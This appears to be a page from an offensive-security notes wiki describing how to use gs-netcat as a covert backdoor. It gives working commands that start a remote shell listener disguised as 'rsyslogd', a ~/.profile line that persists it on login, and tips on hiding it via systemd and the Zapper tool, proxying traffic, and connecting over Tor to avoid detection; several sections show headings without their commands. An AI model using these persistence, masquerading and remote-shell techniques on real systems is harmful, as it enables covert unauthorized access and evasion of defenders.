Edit

gs-netcat

Overview

The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.

More on https://www.gsocket.io.

Non Persistent backdoor

$(GSOCKET_ARGS="-s MySecret -liqD" HOME=/root TERM=xterm-256color SHELL="/bin/bash" /bin/bash -c "cd $HOME; exec -a rsyslogd /path/to/gs-netcat")

Client Connection

gs-netcat -i -s MySecret

  • Above will spawn a full pty giving you the option to tab complete and use up arrow as long as CTRL+C

Persisting the Server .profile

The following line in the user's ~/.profile starts the backdoor (once) when the user logs in. All in one line:

The '( )' brackets start a sub-shell which is then replaced (by exec) with the gs-netcat process. The process is hidden (as rsyslogd) from the process list.

killall -0 gs-netcat 2>/dev/null || (GSOCKET_ARGS="-s MySecret -liqD" SHELL=/bin/bash exec -a rsyslogd /path/to/gs-netcat)

  • Ensure there are no syntax errors or the next time a user logs in they will see this message 

ssh [email protected]
[email protected]'s password: 
Last login: Mon Dec 30 19:29:55 2024 from 192.168.15.172
-bash: /root/.profile: line 11: syntax error: unexpected end of file

  • when you are connected to the backdoor this is how your process will look

  • above will occur no matter how you connect to the server

Persisting the Server systemd (Not Hidden)

  • create secret file

  • create service file

  • after created

  • this is not great because the secret file path or the secret with -s will show up as *********** in the process list

Persisting the Server systemd (Zapper)

  • Zapper is a great tool to hide your cmdline options

  • pull the tool from https://github.com/hackerschoice/zapper

  • example service file, zapper is keybox and gs-netcat is crond in the below example

  • make sure it doesnt exist first

  • quick paste

  • after creating the service file (make sure to alter the key

Command Console

  • If you connect to a listening gs-netcat server with the below options you will have access to the command console

  • access it with CTRL+E c, you will see the below

  • this nicely provides a way to upload and download files as well as local commands just like in metasploit i.e. lls lcd

Proxies

Server to act as a SOCKS4/4a/5 server:

Client to listen on TCP port 1080 and forward any new connection to the server's SOCKS server:

TCP Port Forward all connections to 192.168.6.7:22

Server:

Client to listen on TCP port 2222 and forward any new connection to the the server. The server then forwards the connection to 192.168.6.7:22.

The same using 1 command:

Tor Client Connection

  • For the best security you should always connect to the server via tor

  • Start tor in one window

PreviousLigolo-ngNextScarecrow

Last updated